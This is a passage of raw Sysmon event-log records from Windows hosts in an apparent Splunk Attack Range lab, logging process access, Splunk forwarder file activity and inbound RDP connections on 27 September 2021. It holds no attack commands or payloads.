09:10:55.265{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A9F-6151-307A-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.249{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A9F-6151-307A-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.249{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.249{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.249{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.249{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.249{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A9F-6151-307A-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.230{5EBD8912-8A9F-6151-307A-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.249{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=872D1BDB6447194F93E028916C70EE2D,SHA256=F3CA242A4019C38458C148DD4714E9D241AC6A812336F788C7FDF625425065EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978641Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:55.008{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D56499BDDEF227F037F2F3CE8C360C9,SHA256=6A01307035C86A0D31CB3BE3DB2DD9E41E0F0FBE3A80937BED3639E0C2591311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.082{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D58C4AD355BB83CADB3F82B9BEF8CBF8,SHA256=E50519D180033F7B6331745F66BE251B6AF46726CD527B836B95200BCBB259C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.060{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.35.135unn-212-102-35-135.cdn77.com56839-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.736{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53352-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:56.252{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B7BD9EFF706C8622863CA87EEF119F,SHA256=E72BD80705F2E166F2ADBCC984AB79AC45335AD39AA724787E75BFB21E71728C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:56.252{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C71592B455F43C3992DE02866C510098,SHA256=5BD0877F4482798D84FBAC1A2B1FE5C8BB6FC4DB8835944328F6D1B26AE26DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978645Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:56.962{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B75B1EAB529132A956CD79582391C8FF,SHA256=E7AE838ED99A78BAB4E99A6DC5492EBA97F3840D9A44D57BCA83278FED03E8C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978644Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:56.962{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6C0E90D10E9F8336E54072FED8CC9EF,SHA256=1B9E431105446348FF154CDA960913B2DE7C80E890066D783A9EAD91940343B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978643Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:52.698{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59374-false10.0.1.12-8000- 23542300x8000000000000000978642Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:56.024{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F3DA63253BB98DA604AB65C2DF898C,SHA256=C47AE810751F76F190D42BDBEDD350EB1F9E944F8DFCD40C9D8647C4F0E44C50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:56.073{5EBD8912-8A9F-6151-317A-00000000FC01}9964644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:57.267{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42604BF424AD02413502609412C26D22,SHA256=5C492E28E1A14F098003EA5546B0D0DE677796376D40F20134987096C446E3C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978647Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:53.745{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65224-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978646Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:57.024{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56C265D73161E96BD1E7DAEB1F2FEF09,SHA256=04FAE64F33D909696FA09EA67C70AC4E20621A3E6FC776696924CAE0A9B662C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:58.304{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E10B2218D840B4DB2A23D3F1AE39C1B,SHA256=DB648B34E9CB947541CA1DCAB0C66589CD137FA0470CBB275560CA4D3C5ECB5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978649Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:58.899{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B75B1EAB529132A956CD79582391C8FF,SHA256=E7AE838ED99A78BAB4E99A6DC5492EBA97F3840D9A44D57BCA83278FED03E8C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978648Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:58.040{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE71B68029CD42933D7DFDB09DBCB343,SHA256=0A1435F67879D9FED61DDC9AEA7CC05CA6AC320486CD2B2FA3E171E125F547C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:58.432{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51185-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 